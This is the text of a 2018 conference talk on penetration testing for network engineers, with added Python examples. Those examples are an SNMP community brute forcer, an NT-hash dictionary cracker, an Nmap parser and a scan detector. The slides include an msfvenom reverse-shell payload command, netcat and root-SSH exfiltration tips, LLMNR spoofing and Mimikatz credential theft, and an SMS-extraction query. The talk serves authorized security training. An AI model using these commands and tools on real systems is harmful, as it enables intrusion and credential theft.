#CLUS Penetration Testing For Network Engineers Know Yourself and Enemy, Need Not Fear 100 Battles
Joseph Muniz – Architect Americas BRKSEC-2460
Cisco Webex Teams

Questions? Use Cisco Webex Teams (formerly Cisco Spark) to chat with the speaker after the session.
How:
1. Find this session in the Cisco Events App
2. Click "Join the Discussion"
3. Install Webex Teams or go directly to the team space
4. Enter messages/questions in the team space

Webex Teams will be moderated by the speaker until June 18, 2018. cs.co/ciscolivebot#BRKSEC-2460
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public

Why Do We Fail?
Behind the Headlines
More than Computers and Phones
15B devices today, 50B in 2020, 500B in 2030
IoT Challenges
• Patch delays
• Limited security development
• Rogue devices
Threats Continue
• SamSam
• Nyetya
And Many Get It Wrong
Option 1: Hope Others Fix It
Option 2: Validate What's Going On
Agenda
• Security Language Defined
• Penetration Testing Lab
• Testing Concepts
• Attacking Websites
• Attacking Networks
• Attacking People
• Attacking Mobile Devices
• Attacking IoT
• Reporting and Next Steps
• Conclusion
Yeay For Giveaways!

Download The CTR Comic
https://www.dropbox.com/s/43qfd9f7p8mk8fm/CTR20-Comic.pdf?dl=0
Joseph Muniz, Technical Security Architect
• Security Architect – Americas Sales Organization
• Security Researcher – www.thesecurityblogger.com
• Speaker: Cisco Live / DEFCON / RSA / (ISC)2
• Avid Futbol (Soccer for USA people) Player and Musician
• Twitter @SecureBlogger
Risk Management

Cyberattacks Broken Down
Common language for security professionals:
• An exploit takes advantage of a vulnerability.
• Exploits are not malware; malware is malicious software.
• Vulnerabilities can be exploited.
• A dropper or stage 1 payload comes down to the victim.
• A RAT is a Remote Access Toolkit/Trojan.

Attack chain: Exploit → takes advantage of → Vulnerability → to deliver → Dropper / Rootkit → downloading → Payload (malware, RATs) → Objective / Goal
Not a Penetration Test
• Risk Management – Dealing with any type of risk
• Vulnerability Management – Dealing with vulnerabilities
• Incident Response – Responding to attacks
• Audit – Checking for compliance
• Digital Forensics – Investigating breaches / legal needs
• Hacking – Unlocking features / creating new capabilities
Audit – A specific check, such as compliance
Assessment – Automated tools looking for vulnerabilities
Pentest – Testing vulnerabilities using real exploitation
Compliance
• Driven by legal or business requirements
• Should be treated as the minimum level of security, not the goal
• SOC enforces and reports
• Customized dashboards can help!
Aim for going beyond compliance.
Why First Perform a Vulnerability Assessment Before a Pentest?
Assessment vs Penetration Test
• Assessment – Using automated systems to identify potential vulnerabilities
• Penetration Test – Executing attacks against identified vulnerabilities
An assessment is good for seeing your weaknesses; a penetration test is good for validating that you are as secure as you believe you are.
Common Vulnerabilities and Exposures (CVE)
Example risk entry:
• Vulnerability Type: Apache vulnerability
• Threat Description: Three vulnerabilities in the Apache Struts 2 package
• Existing Controls: Firewalled and monitored by IPS
• Probability: Unlikely (not web facing)
• Impact: Critical
http://cve.mitre.org/about/faqs.html
Vulnerability Assessment Results
Challenges
• May not be real (false positives)
• Hard to execute
• Not accessible
• Critical or not?
• Specific requirements
How to Prioritize Risk – COBIT
Vulnerability Management Current State
Security is a Journey, Not a Destination
SANS – Vulnerability Management
• NAC and profiling can help with asset inventory
• Triggers
  • A CVE identifier may trigger an event
  • Assessment tools
  • Audits
Risk Management Best Practice Summary
• Automate network access
• Continuously assess for vulnerabilities
• Develop a risk rating strategy
• Automate enforcement (if possible)
• Enforce posture upon connection
• Enforce patch management
• Subscribe to and follow researchers
• Don't trust everything you hear
Penetration Testing

Penetration Testing Starting Points
• White Box: Know target details; topology given; informed parties; limited attacks. Very specific work.
• Grey Box: Some details; some topology; limited awareness; many attacks. Hybrid work.
• Black Box: No details; unknown topology; no awareness; any attack. Attack any way possible.
Penetration Testing Services
• Internal teams typically perform White Box
• Grey Box is typically the best value
• Black Box can give interesting results and is the most realistic
• Reconnaissance is typically the most costly service
Work must be properly authorized!
Statement of Work
• Define target systems
• Risks / critical operation areas
• Timeframe
• Evaluation methods
• Target space
• Tools and software
• Define flag
• Notified parties
• Deliverable
• Initial access level
• Expected remediation
• Authorization
• Assumptions
Risks
• Legal rights to perform the test
• Systems could be harmed
• Alarms could be triggered
• Problems will likely be found; now you know and must deal with them
• Boundaries need to be established
Get Out of Jail Card
• Authorization in writing
• Signed by the right person
• State risks
• Assign liability to the stakeholder
Make sure to have this!
Building a Lab

Kali Linux
• Open source penetration testing arsenal
• Many great forensics tools
• Download: www.kali.org
• Make sure to update: apt-get update && apt-get upgrade
Metasploit
• Penetration testing tool used for executing exploit code against a remote target machine
• Hundreds of exploits available
• Search for the vulnerability and use MSF to deliver a packaged attack against the weakness
• Gain shell access, disrupt the target, etc.
Struts Vulnerability Found

Defense Tools are Similar
Search for "struts" in Firepower: lots of signatures for Struts attacks come up. Why can this be bad?
Note: Ethical security vendors don't always tell.
Sandbox – Cuckoo
https://www.cuckoosandbox.org/
TrIDNet or PEiD – file type and packer identification
VMware
Vulnerability Scanners
Running both credentialed and non-credentialed scans is key.
Simple Lab Example
• Mac OS X host running VMware Fusion
• Guests: Kali Linux, Windows 7
• Kali USB
• 200 GB mobile storage
• Internet option
The Process

Attack Kill Chain
Weaponize → Deliver → Exploit → Install → Command & Control → Action
Vectors of an Attack
• Physical: Intel gather, Surveil, Pick, Force, Conceal, Persist
• Digital: Scan, Assess, Exploit, Persist, Propagate, Exfiltrate
• Social: Targeted phishing, Conning guards/staff, Impersonation, Phone phishing, Create spies
• Converged attack: converged attacks are the most effective and the most difficult to thwart
Physical Attacks
• Keyboard drivers
• System backdoor
• Network backdoor
Bash Bunny, Packet Squirrel + Rubber Ducky
https://hakshop.com
USB Script Options
• PoisonTap or Responder – Grab credentials from locked Windows systems
• Reverse SSH – Encrypted tunnel off the network
• Root scripts – Gain shell
• Many many more ... https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Lock Picking
Door Cards – Proxmark3
Digital Attacks
Nmap shows open ports → Nexpose shows vulnerabilities → Metasploit delivers the attack
Social Attacks
Reconnaissance
• Learn everything about the target
• 1st step in an attack and the most time consuming
• The more you know, the better the attack
• Find the quickest and most effective approach
Reconnaissance Tools
• Masscan / Nmap – Scanners
• RIR / EDGAR – Registered public info
• Profiling – Best guess about an endpoint (e.g. nmap -A)
• Public data – Wayback Machine, Maltego, Shodan.io
• Burp – Communication monitoring
• Scanner – Vulnerability searching
• Google Maps / Images / etc. – Physical layout and social
Weaponization
• Build rootkit
• Package with application
• Encode until unrecognizable
Exploitation
Metasploit – Framework for developing and executing exploit code against a remote target machine
Establishing a Foothold
• Obtain access to multiple systems
• If one foothold is removed, others are available
• Accomplished through exploitation and lateral movement, also known as pivoting
Command and Control
• Keyboard access to the network
• Through compromised hosts, systems, etc.
• Best to NOT show a two-way display
• Sometimes a bot network
• Blends in with common traffic
Hard to detect!
Data Exfiltration
• Data removed from the network
• Potentially encrypted (reverse SSH)
• Could break up the data
• Send it with sporadic timing
Attacking Websites
Let the attacking begin

Web Recon – Shodan.io
92% of Internet devices surveyed were running known vulnerabilities, an average of 26 each.
Web Reconnaissance
• Whois – Registrant and contact details, for example an administrator e-mail address
• Google Hacking – intext:classified | "this file generated by Nessus" | intitle:index.of inbox dbx
• Wayback Machine – Find old versions of a website
• Robots.txt – Paths the site wants hidden from spiders
• Banners – Free info about the system
• dig – DNS info
EDGAR and RIR
• ICANN – https://www.icann.org/
• EDGAR – Public company records
• Regional Internet Registries (RIR)
  • USA – www.arin.net/index.html
  • Asia Pacific – http://apnic.net/
  • Europe – http://www.ripe.net
  • Latin America – http://www.lacnic.net
  • Africa – https://www.afrinic.net/en/about/service-region
Interrogate DNS
• Domain Information Groper (dig)
• MxToolbox – web tool
Interrogate DNS (Inside)
Find the DNS suffix in use on the domain:
  cat /etc/resolv.conf
Find the list of Domain Controllers:
  nslookup
  > set q=SRV
  > _ldap._tcp.dc._msdcs.<domain>
Target Fingerprinting
• ICMP port unreachable messages
• Banners
• Binaries
• Port signatures
• Non-standard handshakes
• Response to SYN floods
• Packets with non-standard TCP/IP flags
Tools like Nmap can do this for you.
Network Mapper (Nmap)
• -sP = Ping sweep / host discovery (-sn in current releases)
• -sT = TCP connect scan (completes the three-way handshake)
• -sV = Service interrogation / version detection
• -sU = UDP scanning
• -sA = ACK scan to map out firewall rulesets (stateful? which ports are filtered?)
• -sF = FIN scan to discover closed ports
• hping3 – Command-line oriented TCP/IP packet assembler/analyzer
Stealth / Legal
• Completing the handshake could be illegal!
• -sT = illegal | -sS = not illegal (not legal advice!)
• SYN scan – Half-open scan for stealth
• Add delay (example: --scan-delay 90000, which Nmap reads as milliseconds, i.e. 90 seconds between probes)
• Send ICMP traffic with different types
• The content of the response doesn't matter; you are looking for live hosts!
Save active devices to a file (the last field carries the IP whether or not Nmap printed a hostname in front of it):
  grep "report for" alive-scan.txt | awk '{print $NF}' | tr -d '()' | tee alive-IPs.txt
Open Ports ... Now What?
• Determine the services/daemons that are running to find exploits (e.g. nmap -sV)
• Port numbers – www.iana.org/assignments/port-numbers
• Ports can run any service! Interrogate a port by connecting to it.
• Example: telnet to port 25
Also gather other data, like banners.
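The grep/awk one-liner on the stealth slide is fragile: when Nmap has a reverse DNS name it prints "Nmap scan report for host (10.0.0.5)", and the banner-hunting step needs the open ports too. The following Python is an added example, not from the deck or from Nmap itself, that parses Nmap's normal (-oN) output into live hosts and open services and pulls out the cleartext services worth interrogating by hand first. The scan text it reads is constructed here in Nmap's format, and the CLEARTEXT_SERVICES set is my own choice.

```python
"""Parse nmap normal (-oN) output for live hosts and open services.
Added example; SAMPLE_OUTPUT is constructed in nmap's format, not a real scan."""
import re

REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<host>\S+) \((?P<ip1>\d+(?:\.\d+){3})\)|(?P<ip2>\d+(?:\.\d+){3}))"
)
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)

# Constructed sample: one host with a hostname, one without, one down.
SAMPLE_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.0.0.1
Host is up (0.0010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
23/tcp  open  telnet  Cisco IOS telnetd
161/udp open  snmp    SNMPv1 server (public)
Nmap scan report for fileserver.corp.example (10.0.0.20)
Host is up (0.0021s latency).
PORT     STATE    SERVICE      VERSION
22/tcp   open     ssh          OpenSSH 7.4 (protocol 2.0)
80/tcp   open     http         Apache httpd 2.4.6
139/tcp  closed   netbios-ssn
445/tcp  filtered microsoft-ds
Nmap scan report for 10.0.0.99
Host is down.
Nmap done: 3 IP addresses (2 hosts up) scanned in 12.34 seconds
"""


def parse_nmap(text):
    """Return {ip: {"hostname": str|None, "up": bool, "ports": [(port, proto, service, version)]}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            ip = m.group("ip1") or m.group("ip2")        # IP sits in parens when a hostname is shown
            current = hosts.setdefault(ip, {"hostname": m.group("host"), "up": False, "ports": []})
            continue
        if current is None:
            continue
        if line.startswith("Host is up"):
            current["up"] = True
            continue
        m = PORT_RE.match(line)
        if m and m.group("state") == "open":             # skip closed, filtered and open|filtered
            current["ports"].append((int(m.group("port")), m.group("proto"),
                                     m.group("service"), (m.group("version") or "").strip()))
    return hosts


def alive_ips(text):
    """The 'alive-IPs.txt' list: every host nmap reported up, hostname or not."""
    return sorted(ip for ip, h in parse_nmap(text).items() if h["up"])


# Services that carry credentials in the clear: connect and read the banner first.
CLEARTEXT_SERVICES = {"telnet", "ftp", "pop3", "imap", "http", "snmp"}


def cleartext_exposures(text):
    """(ip, port, service) tuples for cleartext services found open."""
    return [(ip, port, svc) for ip, h in parse_nmap(text).items()
            for port, _proto, svc, _ver in h["ports"] if svc in CLEARTEXT_SERVICES]
```

Feed it the file written by nmap -oN; nmap -oG (grepable) and -oX (XML) are easier to parse mechanically, but the normal output is what ends up in most engagement notes.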
OWASP Top 10
• Easy to get to, poor security and most vulnerable!
• OWASP – Great resource for news and standards
OWASP Top 10 (2007 list):
• Cross Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution
• Insecure Direct Object Reference
• Cross Site Request Forgery
• Information Leakage and Improper Error Handling
• Broken Authentication and Session Management
• Insecure Cryptographic Storage
• Insecure Communications
• Failure to Restrict URL Access
Summarizing Web Testing
Attacking Networks

Plugging in Networks
• No security = Instant access
• Port security = Possibly a static MAC list
• NAC = Need to beat the assessment profile
• NAC is port driven; try unusual ports
Spoofing trusted devices may work.
Hacking SNMP
• Default communities – public / private
• Spoof the address of the manager or devices
• Typically nobody notices "quiet" devices
• Brute force SNMP authentication
• Typically not monitored
• SNMP walking – Try strings across multiple systems
• SNMP brute force – Run a .txt file of strings
• SNMP attacking – Abuse when RW is enabled

Attacking SNMP
• onesixtyone – Brute force with a text file of community strings
• snmpwalk – Test various community strings
• Example result: "public" exists, "private" doesn't
Change the SNMP community if RW is enabled! Find SNMPv1 configuration by grepping the device configuration for "v1".
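onesixtyone and snmpwalk both work the same way underneath: send an SNMPv1 GetRequest for sysDescr.0 with a candidate community string and see whether the agent answers. SNMPv1 agents silently drop requests carrying a wrong community, so "no reply within the timeout" is the wrong-string signal. The following Python is an added example, not from the deck and not the code of either tool: it hand-encodes the request (BER, standard library only), decodes the reply and loops a wordlist. Port 161 and the sysDescr.0 OID are the only network assumptions; run it only against systems you are authorized to test.

```python
"""SNMPv1 community-string probing, the way onesixtyone does it.
Added example; BER is hand-rolled so it runs with the standard library only."""
import socket

SYS_DESCR_OID = (1, 3, 6, 1, 2, 1, 1, 1, 0)   # sysDescr.0, the usual harmless probe


def tlv(tag, body):
    """BER type-length-value with short or long-form length."""
    n = len(body)
    if n < 128:
        return bytes([tag, n]) + body
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + body


def ber_int(value):
    """Non-negative INTEGER: minimal big-endian, leading 0x00 when the high bit is set."""
    return tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big"))


def ber_oid(arcs):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    out = [arcs[0] * 40 + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return tlv(0x06, bytes(out))


def build_get_request(community, request_id=1):
    """SNMPv1 (version field 0) GetRequest for sysDescr.0 under the given community."""
    varbind = tlv(0x30, ber_oid(SYS_DESCR_OID) + tlv(0x05, b""))            # OID + NULL
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)


def read_tlv(buf, pos):
    """Return (tag, body, next_pos) for the TLV starting at pos."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                          # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_message(data):
    """Decode an SNMPv1 message (GetRequest 0xA0 or GetResponse 0xA2) into a dict."""
    tag, msg, _ = read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, p = read_tlv(msg, 0)
    _, community, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    _, req_id, q = read_tlv(pdu, 0)
    _, err_status, q = read_tlv(pdu, q)
    _, _err_index, q = read_tlv(pdu, q)
    _, varbinds, _ = read_tlv(pdu, q)
    _, vb, _ = read_tlv(varbinds, 0)
    _, _oid_bytes, r = read_tlv(vb, 0)
    val_tag, val, _ = read_tlv(vb, r)
    return {
        "version": int.from_bytes(version, "big"),
        "community": community.decode(errors="replace"),
        "pdu_tag": pdu_tag,
        "request_id": int.from_bytes(req_id, "big"),
        "error_status": int.from_bytes(err_status, "big"),
        "value": val.decode(errors="replace") if val_tag == 0x04 else None,
    }


def probe_community(host, community, timeout=1.0, port=161):
    """True if the agent answers this community. SNMPv1 agents drop bad
    communities silently, so a timeout is the 'wrong string' signal."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community), (host, port))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return False
    reply = parse_message(data)
    return reply["pdu_tag"] == 0xA2 and reply["error_status"] == 0


def brute_force(host, wordlist):
    """Community strings the agent accepted, in wordlist order."""
    return [c for c in wordlist if probe_community(host, c)]
```

A read-only community only gives you sysDescr and the rest of the MIB; the dangerous case on the slide is a guessable read-write string, which you confirm separately with an SNMP SetRequest on a harmless object, never by blindly writing configuration.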
Viewing Network Data
• Inline – direct, real-time live traffic
• SPAN port – copy of traffic
PCAP = historical. Live capture should be filtered (for example, a tcpdump filter on HTTP POSTs). Wireshark display filters for the TCP handshake:
  SYN:      tcp.flags.syn && tcp.flags.ack==0
  SYN-ACK:  tcp.flags.syn==1 && tcp.flags.ack==1
  RST-ACK:  tcp.flags.reset && tcp.flags.ack
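The three display filters above are tests on the TCP flag byte, and the half-open SYN scan from the stealth slide is exactly what they expose in a capture: many SYNs, a few SYN-ACKs, a pile of RST-ACKs, and never the bare ACK that completes a handshake. This added Python example (not from the deck) parses raw IPv4/TCP headers, applies the same three tests, and flags a source that SYNs many distinct ports on a target without ever completing a connection. The packets are constructed in sample_capture() rather than read from a real capture, and the min_ports threshold is an assumption.

```python
"""Classify TCP segments by flag bits (the Wireshark filters above) and spot
half-open (nmap -sS style) scans. Added example; traffic is constructed below."""
import socket
import struct
from collections import Counter, defaultdict

FIN, SYN, RST, ACK = 0x01, 0x02, 0x04, 0x10


def parse_ipv4_tcp(packet):
    """Return (src, sport, dst, dport, flags) from raw IPv4+TCP header bytes."""
    ihl = (packet[0] & 0x0F) * 4                       # IPv4 header length in bytes
    src = socket.inet_ntoa(packet[12:16])
    dst = socket.inet_ntoa(packet[16:20])
    sport, dport = struct.unpack("!HH", packet[ihl:ihl + 4])
    flags = packet[ihl + 13] & 0x3F                    # byte 13 of the TCP header
    return src, sport, dst, dport, flags


def classify(flags):
    """Mirror the Wireshark filters: SYN, SYN-ACK and RST-ACK segments."""
    if flags & SYN and not flags & ACK:
        return "SYN"          # tcp.flags.syn && tcp.flags.ack==0
    if flags & SYN and flags & ACK:
        return "SYN-ACK"      # tcp.flags.syn==1 && tcp.flags.ack==1
    if flags & RST and flags & ACK:
        return "RST-ACK"      # tcp.flags.reset && tcp.flags.ack
    if flags & RST:
        return "RST"
    return "OTHER"


def summarize(packets):
    """Count segments per class, a capture-wide view of the three filters."""
    return Counter(classify(parse_ipv4_tcp(p)[4]) for p in packets)


def detect_half_open_scans(packets, min_ports=10):
    """Heuristic for -sS: one source SYNs many distinct ports on one target and
    never sends the bare ACK that completes the handshake (a connect scan, -sT,
    would). Returns {(src, dst): number_of_unfinished_ports}."""
    syn_ports = defaultdict(set)
    completed = set()
    for pkt in packets:
        src, _sport, dst, dport, flags = parse_ipv4_tcp(pkt)
        if classify(flags) == "SYN":
            syn_ports[(src, dst)].add(dport)
        elif flags & ACK and not flags & (SYN | RST | FIN):   # third handshake step
            completed.add((src, dst, dport))
    suspects = {}
    for (src, dst), ports in syn_ports.items():
        unfinished = [port for port in ports if (src, dst, port) not in completed]
        if len(unfinished) >= min_ports:
            suspects[(src, dst)] = len(unfinished)
    return suspects


def build_segment(src, sport, dst, dport, flags):
    """Constructed IPv4+TCP headers (checksums zeroed); enough for parsing."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 1024, 0, 0)
    return ip + tcp


def sample_capture():
    """Constructed traffic: a SYN scan of 12 ports plus one legitimate connection."""
    scanner, client, target = "10.0.0.5", "10.0.0.7", "10.0.0.20"
    open_ports = (22, 80, 443)
    pkts = []
    for port in (21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389):
        pkts.append(build_segment(scanner, 40000, target, port, SYN))
        if port in open_ports:
            pkts.append(build_segment(target, port, scanner, 40000, SYN | ACK))
            pkts.append(build_segment(scanner, 40000, target, port, RST))   # half-open teardown
        else:
            pkts.append(build_segment(target, port, scanner, 40000, RST | ACK))
    pkts.append(build_segment(client, 50000, target, 443, SYN))             # real client
    pkts.append(build_segment(target, 443, client, 50000, SYN | ACK))
    pkts.append(build_segment(client, 50000, target, 443, ACK))
    return pkts
```

The same counts come straight out of Wireshark's Statistics view with those filters applied; the point of scripting it is to run the test continuously on a SPAN feed, where a --scan-delay of 90 seconds per probe would otherwise stay below anything a human notices.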
WiFi MiTM
• Karma – Clone SSIDs and man-in-the-middle the mobile device
• SSL Strip – Downgrade HTTPS requests so authentication is in the clear
Defending
• VPN
• Disable auto WiFi connect
• WIDS/WIPS
• Remove HTTP from critical servers and enforce HTTPS (HSTS)
How Easy is Getting Wireless MiTM?
WiFi Pineapple
• Wireless pentesting tool
• Can spoof SSIDs and perform SSL Strip
• Cost: $100 to $200 from Hak5
Raspberry Pi
• $35 computer
• Can host any OS, including Kali Linux
• Kali Linux offers multiple penetration testing applications
Network MiTM
• Get network traffic through your device
• ARP poison
• Inline
• Proxy (network or host)
Packet Squirrel | Ettercap = Easy testing
Targeting User Accounts
• Abuse Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS)
• Both resolve hostnames to IP addresses when DNS cannot
• Trick the victim into connecting to Kali Linux instead of the real host, then capture the credentials it offers
Metasploit modules:
  auxiliary/spoof/llmnr/llmnr_response
  auxiliary/spoof/nbns/nbns_response
  auxiliary/server/capture/smb

Windows – ShareCheck
• Use of non-standard local admin accounts
• Windows file sharing vulnerabilities
• Global groups granted local admin access
• Insecure account lockout
http://www.sec-1.com/blog/2014/sharecheck
Attacking Logging and Time
• Injecting false information
• Wiping logs
• Adjusting timestamps
• Word wrapping – Using white space padding
• HTML or terminal attack (injecting markup or escape sequences into log entries so the viewer renders them)
Exfiltration
• Allow remote root – in /etc/ssh/sshd_config, comment out "PermitRootLogin no"
• Netcat
• Create an account on an existing FTP / SSH server
• Lightweight FTP – BabyFTP | vsftpd | Mollensoft FTP
Avoid Trojans and keyloggers – painful cleanup!
Attacking People
You can be anybody

Emily Williams
• Total connections: 170 employees (71 Cisco; 22 NetApp; 10 EMC; 35 McAfee); 300+ Facebook friends
• Endorsements: 22 LinkedIn endorsements for expertise and experience, from partners and co-workers
• Offers: 4 job offers, laptop and office equipment, network access
Speak Like Your Target
• Use Facebook and LinkedIn as a weapon
• What do you leave on social networks that could be used against you?
• Hide attacks in social media messages
• Read their e-mail / posts / etc. and learn their language
Phishing / Spear Phishing
• Best to customize based on recon
• Tie it to holidays / events
• Language is everything!
• Goal can be information or causing an action
Practice this skill.
Phishing Emails
Cisco Phishing Stats
Browser Exploitation Framework (BeEF)
• Hook victim browsers as beachheads for attacks
• Social engineer the victim into clicking a customized link
• Available attacks depend on current browser vulnerabilities
• Can track hooked systems
Social-Engineer Toolkit (SET)
• Easily clone a website
• Create various phishing attacks
• Create payload and listener
• Mailer attacks
• PowerShell attacks
• And many many more ...
Business Email Compromise
Attacker: "We have conference dues to pay that are late. Pay at www.hackme.com/dues"
Cisco Financial: "Ok I'm on it!"
Attacking Exploits

Packing Malware 101
Goal: bypass signature-based detection.
Executable = (un)packer (changed frequently) + payload (the unpacked malware, changed less frequently)
Encoding 1 – Create Backdoor
Metasploit: msfvenom -p python/meterpreter/reverse_tcp LHOST=<any IP> LPORT=<any port> -f raw > anyname.py
Encoding 2 – Decode and Add Junk
• Open with a text editor
• Decode the base64 stage (https://www.base64decode.org/ is one option; decoding locally with base64 -d keeps your payload off a third-party site)
• Copy the source code, paste and modify
Privilege Escalation
• cpassword – Group Policy Preferences passwords, encrypted but reversible (the AES key is public)
• GP3finder simplifies it: gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAINUSER
• Mimikatz – Credential extraction (also available as a Meterpreter extension)
• Incognito – Enumerate and impersonate tokens
Why is Empire / PowerShell so effective at bypassing host security (Windows)?

Empire
• Post-exploitation framework targeting Windows
• Listener – Waits for the connection
• Stager – Code placed on the compromised system
• Agent – Maintains the connection between you and the victim
• Runs commands in memory through PowerShell, a trusted signed Microsoft binary, so there is no malicious file on disk to scan
• Antivirus hates this!
Password Cracking Concepts
• BIOS – Try the manufacturer's default password
• Guessing or recovering a password (admin | password | cisco | blank | vendor name)
• Dictionary / rainbow tables
• Man-in-the-middle
• Attacking the encryption
Lots of Password Cracking Tools
• Brutus – Remote online cracking tool
• RainbowCrack – Hash cracker, Windows/Linux
• Wfuzz – Web application brute forcing (GET / POST), (SQL, XSS, LDAP, etc.)
• Cain and Abel – Windows tool with several password cracking features
• John the Ripper – Offline mode, automatic hash type detection
• THC Hydra – Online dictionary attack tool supporting over 30 protocols
• Aircrack-ng – WEP and WPA-PSK key cracking
• OphCrack / Medusa / L0phtCrack / etc. ...
CeWL – Custom wordlist generator that spiders a target website
Passwords
• Windows password storage – SAM
• SYSKEY – Additional SAM encryption
• Linux password storage – /etc/passwd and /etc/shadow
• Attacking Active Directory
• Local Security Authority (LSA) cached accounts
• Microsoft hashing types (LM, NT)
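The deck lists "Microsoft hashing types" and "dictionary / rainbow tables" on neighbouring slides; they belong together because the NT hash is plain MD4 over the UTF-16LE password with no salt, which is what makes both dictionary and rainbow-table attacks cheap. The following Python is an added example, not from the deck or from any tool it names: it implements MD4 by hand (many OpenSSL 3 builds leave MD4 out of hashlib), computes NT hashes, and runs a dictionary attack against a constructed dump, also showing how identical hashes give away shared passwords before any cracking starts. SAMPLE_DUMP and COMMON_GUESSES are made up here.

```python
"""NT hash (MD4 over UTF-16LE) and a dictionary attack on a dumped hash list.
Added example; MD4 is implemented here because hashlib often lacks it, and the
dump below is constructed, not real."""
import struct


def md4(data):
    """RFC 1320 MD4 digest of a byte string."""
    mask = 0xFFFFFFFF

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    def rotl(x, n):
        x &= mask
        return ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"                      # padding: 0x80, zeros, 64-bit length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                                   # round 1
            a, b, c, d = d, rotl(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                                   # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl(a + g(b, c, d) + x[k] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl(a + h(b, c, d) + x[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password):
    """Windows NT hash: MD4 of the UTF-16LE password, unsalted and case-sensitive."""
    return md4(password.encode("utf-16-le")).hex()


def group_by_hash(dumped):
    """{nt_hash_hex: [users]} for a {user: nt_hash_hex} dump."""
    by_hash = {}
    for user, digest in dumped.items():
        by_hash.setdefault(digest.lower(), []).append(user)
    return by_hash


def dictionary_attack(dumped, wordlist):
    """dumped: {username: nt_hash_hex} as pulled with Mimikatz. Because NT hashes
    are unsalted, one hash per candidate word checks every account at once."""
    by_hash = group_by_hash(dumped)
    cracked = {}
    for word in wordlist:
        for user in by_hash.get(nt_hash(word), ()):
            cracked[user] = word
    return cracked


def shared_passwords(dumped):
    """Accounts that share an NT hash, and therefore a password, before cracking."""
    return [sorted(users) for users in group_by_hash(dumped).values() if len(users) > 1]


# Constructed dump: the admin's password is in the deck's list of common guesses,
# and a service account reuses a user's password.
SAMPLE_DUMP = {
    "alice": "8846F7EAEE8FB117AD06BDD830B7586C",          # "password"
    "bob": nt_hash("Cisco123"),
    "svc_backup": nt_hash("Cisco123"),
    "carol": nt_hash("correct horse battery staple"),
}
COMMON_GUESSES = ["admin", "password", "cisco", "Cisco123", ""]
```

The attack is linear in the wordlist because no salt forces per-account work; that is also why a leaked NT hash is usable directly in pass-the-hash without ever being cracked, which the privilege escalation slide's Mimikatz bullet is really about.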
Attacking Mobile Devices

Always Research
• Mobile exploitation is constantly changing
• New vulnerabilities are constantly discovered
• Vendors are improving patching
• Attack tools are constantly improving
Attacks are not black and white – TEST!
Phones: iOS / Mac OS X
• Jailbreaking, usually older iOS
• Attack iTunes backups
• AnyTrans or iPhone Backup Extractor
• iOS snapshots
Phones: Android
• Older – Connects like mass storage
• Version 6 or later – Encrypted
• Root the device – KingoRoot
• SMS database: /data/data/com.android.providers.telephony/databases/mmssms.db
• Query to read SMS:
  SELECT datetime(date/1000, 'unixepoch', 'localtime'),
         datetime(date_sent/1000, 'unixepoch', 'localtime'),
         person, body
  FROM sms WHERE thread_id = 310 ORDER BY date
Example Reading SMS
| date                | date_sent           | person | body                                                         |
|---------------------|---------------------|--------|--------------------------------------------------------------|
